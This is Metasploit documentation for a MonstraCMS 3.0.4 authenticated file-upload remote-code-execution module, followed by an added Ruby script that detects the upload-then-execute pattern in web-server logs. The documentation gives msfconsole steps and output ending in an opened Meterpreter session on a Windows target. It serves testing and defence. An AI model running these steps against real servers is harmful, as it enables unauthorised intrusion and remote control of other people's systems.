metasploit-framework/documentation/modules/exploit/multi/http/monstra_fileupload_exec.md

## Description

MonstraCMS 3.0.4 allows users to upload arbitrary files which leads to remote command execution on the remote server. An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file. This module was tested against MonstraCMS 3.0.4. Additional information and vulnerabilities can be viewed on Exploit-DB 43348.

## Vulnerable Application

Available at Exploit-DB

### Vulnerable Application Installation Setup

1. Download the application: https://www.exploit-db.com/apps/23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip
2. Extract `23663fc7b47c4c1e476b793ea53660bc-monstra-3.0.4.zip`
3. Move the extracted directory into the web root: `C:\xampp\htdocs\`
4. Now visit: http://localhost/

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/multi/http/monstra_fileupload_exec`
4. Do: `set rport <port>`
5. Do: `set rhost <ip>`
6. Do: `set targeturi monstra`
7. Do: `set username USERNAME`
8. Do: `set password PASSWORD`
9. Do: `check`
   ```
   [*] Monstra CMS: 3.0.4
   [+] 192.168.0.101:80 The target is vulnerable.
   ```
10. Do: `set lport <port>`
11. Do: `set lhost <ip>`
12. Do: `exploit`
13. You should get a shell.

## Scenarios

### Monstra CMS on Windows Target

```
msf exploit(multi/http/monstra_fileupload_exec) > check

[*] Monstra CMS: 3.0.4
[+] 192.168.0.101:80 The target is vulnerable.
msf exploit(multi/http/monstra_fileupload_exec) > exploit

[*] Started bind handler
[*] Trying to Login ......
[+] Authentication successful : [ editor : editor ]
[+] CSRF-Token for File Upload : 2a67a7995c15c69a158d897f517e3aff2e3a4ae9
[*] Trying to upload file with malicious Content....
[*] Executing Payload
[*] Sending stage (37775 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (10.0.2.15:45689 -> 192.168.0.101:4444) at 2018-06-30 12:39:53 +0530
[+] Deleted TSPfeLYdMP.PHP

meterpreter > sysinfo
Computer    : 114619-T470P
OS          : Windows NT 114619-T470P 10.0 build 16299 (Windows 10) AMD64
Meterpreter : php/windows
meterpreter >
```
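The Description and the scenario output above describe the same sequence from the attacker's side: an authenticated upload through the admin interface, followed by a request for the freshly created PHP file, which is then deleted. The following Ruby script is an added example for defenders, not part of the module or of the Metasploit documentation: it correlates web-server access-log entries and flags a client that POSTs to the admin upload endpoint and, within a short window, fetches a PHP script that no client had ever requested before. The Apache combined log format, the `id=filesmanager` upload endpoint, the `/monstra/uploads/` directory, and the 120-second window are assumptions; the sample log lines are constructed and only reuse the addresses and file name from the scenario output.

```ruby
# Added example (not the module's or Metasploit's own code): correlate
# access-log entries to detect an upload-then-execute sequence.
require 'time'
require 'set'

# Apache combined log format (assumed): client, timestamp, request line, status.
LOG_LINE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
# Admin file-manager upload endpoint (assumption; adjust to the deployed path).
UPLOAD_PATH = /id=filesmanager/i
# Server-side script extensions, matched case-insensitively so ".PHP" counts too.
SCRIPT_EXT = /\.(php\d?|phtml)\z/i
WINDOW_SECONDS = 120

Event = Struct.new(:ip, :time, :method, :path, :status)

def parse_line(line)
  m = LOG_LINE.match(line)
  return nil unless m
  Event.new(m[:ip], Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
            m[:method], m[:path], m[:status].to_i)
end

# Returns one alert per first-time request of a script file that follows a
# successful upload POST from the same client within WINDOW_SECONDS.
def find_upload_then_exec(lines, window: WINDOW_SECONDS)
  events = lines.map { |l| parse_line(l) }.compact
  seen_scripts = Set.new   # scripts any client has requested so far
  last_upload = {}         # ip => time of most recent successful upload POST
  alerts = []
  events.each do |ev|
    script = ev.path.split('?').first
    if ev.method == 'POST' && ev.path.match?(UPLOAD_PATH) && ev.status < 400
      last_upload[ev.ip] = ev.time
    elsif ev.method == 'GET' && script.match?(SCRIPT_EXT)
      t = last_upload[ev.ip]
      if t && !seen_scripts.include?(script.downcase) && (ev.time - t).between?(0, window)
        alerts << { ip: ev.ip, script: script, upload_at: t, exec_at: ev.time }
      end
      seen_scripts << script.downcase
    end
  end
  alerts
end

# Constructed sample log: one ordinary visitor, then the sequence from the
# scenario output (login, upload, first request of the new .PHP file).
SAMPLE_LOG = <<~LOG
  192.168.0.50 - - [30/Jun/2018:12:30:01 +0530] "GET /monstra/index.php HTTP/1.1" 200 5120
  10.0.2.15 - - [30/Jun/2018:12:39:40 +0530] "GET /monstra/index.php HTTP/1.1" 200 5120
  10.0.2.15 - - [30/Jun/2018:12:39:45 +0530] "POST /monstra/admin/index.php?id=users&action=login HTTP/1.1" 302 0
  10.0.2.15 - - [30/Jun/2018:12:39:50 +0530] "POST /monstra/admin/index.php?id=filesmanager&path=uploads/ HTTP/1.1" 302 0
  10.0.2.15 - - [30/Jun/2018:12:39:52 +0530] "GET /monstra/uploads/TSPfeLYdMP.PHP HTTP/1.1" 200 37775
  10.0.2.15 - - [30/Jun/2018:12:39:55 +0530] "GET /monstra/index.php HTTP/1.1" 200 5120
LOG

if __FILE__ == $PROGRAM_NAME
  find_upload_then_exec(SAMPLE_LOG.lines).each do |a|
    puts "ALERT #{a[:ip]} uploaded at #{a[:upload_at]} then fetched #{a[:script]} at #{a[:exec_at]}"
  end
end
```

The "never seen before" test is what keeps the rule quiet on normal admin activity: an editor who uploads an image and then returns to `index.php` trips nothing, while a script name that first appears seconds after an upload from the same client is exactly the artefact the module leaves behind (and deletes again, so the log line may be the only trace).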